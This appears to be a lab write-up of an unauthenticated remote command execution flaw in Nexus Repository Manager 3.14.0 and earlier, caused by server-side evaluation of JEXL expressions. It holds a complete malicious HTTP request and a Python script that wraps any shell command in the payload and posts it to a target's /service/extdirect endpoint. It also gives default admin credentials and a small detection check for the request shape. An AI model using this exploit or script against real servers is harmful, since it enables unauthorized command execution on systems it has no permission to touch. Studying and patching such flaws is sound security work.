Nexus Repository Manager 3 is a software repository used to store and distribute software artifacts in formats such as Maven and NuGet. In versions 3.14.0 and earlier, the asset preview feature accepts arbitrary JEXL expressions (implemented on top of custom OrientDB functions) and evaluates them on the server. The endpoint that does this is reachable without authentication, so anyone who can reach the web interface can execute arbitrary commands on the server.
Access http://your-ip:8081 to view the web page.
Log in to the backend with the credentials admin:admin123, then upload any jar file to the maven-releases repository.

The expression is evaluated against existing assets, so to trigger this vulnerability make sure there is at least one artifact in the repository (the jar uploaded above is enough). Then send the following request; note that it carries no session cookie or Authorization header:
POST /service/extdirect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 368
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
As shown, the command has been executed and /tmp/success has been created on the server:

The root cause is that the JEXL expression supplied in the "expression" field is evaluated on the server as-is. The exec() call above is blind, since only the side effect on the filesystem shows that it ran; by using a classloader to load bytecode from the expression, you can obtain the command output in the response:
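The following script is an added example and is not code from the original page or from the Nexus project. It reproduces the unauthenticated previewAssets request shown above in Python: build_payload() constructs the same ExtDirect JSON body, exec_expression() produces the page's JEXL expression for an arbitrary command, send() posts it to /service/extdirect, and flag_request() is a small detection check for a WAF or log review that matches the request shape of this attack. The base URL, the target repository name, the JEXL single-quote escaping rule (backslash escapes, as in JEXL string literals) and the sample "benign" request used for comparison are assumptions for illustration.

```python
"""Added example: build, send and detect the unauthenticated
previewAssets/JEXL request used against Nexus Repository Manager 3 <= 3.14.0.
Not part of the original page; URLs and repository names are assumptions."""
import json
import urllib.request

ENDPOINT = "/service/extdirect"  # ExtDirect RPC entry point used by the page's request


def jexl_string(s):
    """Quote a Python string as a JEXL single-quoted literal.
    Assumes JEXL's backslash escapes for ' and \\ inside string literals."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def exec_expression(command):
    """Same construction as the page's payload: the numeric literal 233 is a
    java.lang.Integer, .class reaches java.lang.Class, forName() resolves
    java.lang.Runtime, and exec() runs the command (blind: no output returned)."""
    return "233.class.forName('java.lang.Runtime').getRuntime().exec(%s)" % jexl_string(command)


def build_payload(expression, repository="*", tid=8):
    """ExtDirect body for coreui_Component.previewAssets with a JEXL selector.
    repository='*' asks Nexus to evaluate the expression across all repositories."""
    return {
        "action": "coreui_Component",
        "method": "previewAssets",
        "data": [{
            "page": 1, "start": 0, "limit": 50,
            "sort": [{"property": "name", "direction": "ASC"}],
            "filter": [
                {"property": "repositoryName", "value": repository},
                {"property": "expression", "value": expression},
                {"property": "type", "value": "jexl"},
            ],
        }],
        "type": "rpc",
        "tid": tid,
    }


def send(base_url, payload, timeout=10):
    """POST the payload with the same headers as the page's request and return
    the parsed JSON reply. No credentials are sent: that is the vulnerability."""
    body = json.dumps(payload).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT, data=body, method="POST",
        headers={"Content-Type": "application/json",
                 "X-Requested-With": "XMLHttpRequest",
                 "Accept": "*/*"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


def flag_request(body):
    """Detection check: True for a previewAssets call whose filter declares a
    JEXL selector. Feed it the parsed JSON body of a POST to /service/extdirect."""
    if body.get("action") != "coreui_Component" or body.get("method") != "previewAssets":
        return False
    for item in body.get("data") or []:
        filters = item.get("filter") or []
        types = {f.get("value") for f in filters if f.get("property") == "type"}
        has_expr = any(f.get("property") == "expression" for f in filters)
        if "jexl" in types and has_expr:
            return True
    return False


if __name__ == "__main__":
    # Assumed target; after running, check for /tmp/success on the Nexus host.
    payload = build_payload(exec_expression("touch /tmp/success"))
    print(json.dumps(payload))
    print(send("http://your-ip:8081", payload))
```

Because exec() returns nothing useful to the caller, confirm success through the side effect (the file on the host) or an out-of-band callback such as a DNS or HTTP request to a listener you control. On the defensive side, flag_request() is a reasonable shape to put in front of /service/extdirect until the instance is upgraded past 3.14.0; on a patched instance the same call requires an authenticated session.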